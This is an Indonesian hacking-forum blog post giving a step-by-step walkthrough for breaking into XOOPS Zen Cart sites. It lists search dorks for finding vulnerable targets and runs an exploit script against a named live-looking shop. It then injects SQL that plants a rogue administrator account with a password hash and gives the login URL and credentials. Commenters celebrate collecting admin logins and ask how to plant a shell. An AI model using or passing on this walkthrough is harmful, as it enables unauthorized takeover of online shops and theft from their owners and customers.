Rabu, 18 Januari 2012

Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Hack XOOPS Module Zen Cart

19 September 2009
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner



5
 
4
 
9
share

This an old bug from BlackH >> http://milw0rm.com/exploits/9005
works for Zen Cart version 1.3.8 but its works on XOOPS Zen Cart module too
lets go.. :p

google dork

“powered by xoops” inurl:”modules/zox”
“powered by xoops” “zen cart”

run the exploit from ur shell

root@evilc0de:/home/noge# ./zen.py -url http://www.a-akinai.com/modules/zox
sql@jah$

now try with show tables; command, if it success then we can exploit the target

sql@jah$ show tables;
>> success ( show tables; )

command execute successfully.. but u cant see the table list right?
lets add admin user to database with this sql command..

sql@jah$ INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, ‘giant’, ‘admin@localhost’, ’617ec22fbb8f201c366e9848c0eb6925:87′);
>> success ( INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, ‘giant’, ‘admin@localhost’, ’617ec22fbb8f201c366e9848c0eb6925:87′); )

admin added successfully.. now try login to admin panel..

http://www.a-akinai.com/modules/zox/admin/login.php

username : giant
password : wew

Article From: NoGe / evilc0de

BINUS HACKER Binus Hacker Chat and Forum

Komentar

3 Komentar Untuk “Hack XOOPS Module Zen Cart
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. Maling pada 20 July 2010 6:20 am

    Wah, banyak database neh.
    Aseek aseekk..

  2. Dedi pada 20 July 2010 6:25 am

    Cart, cart again!
    cIhuY.. wAktunya memperbanyak koleksi admin login.
    Mak nyuz!

  3. poecundank pada 15 March 2011 12:53 am

    cara pasang shell di zencart gmna mas?????

Silahkan Berikan Tanggapan Anda...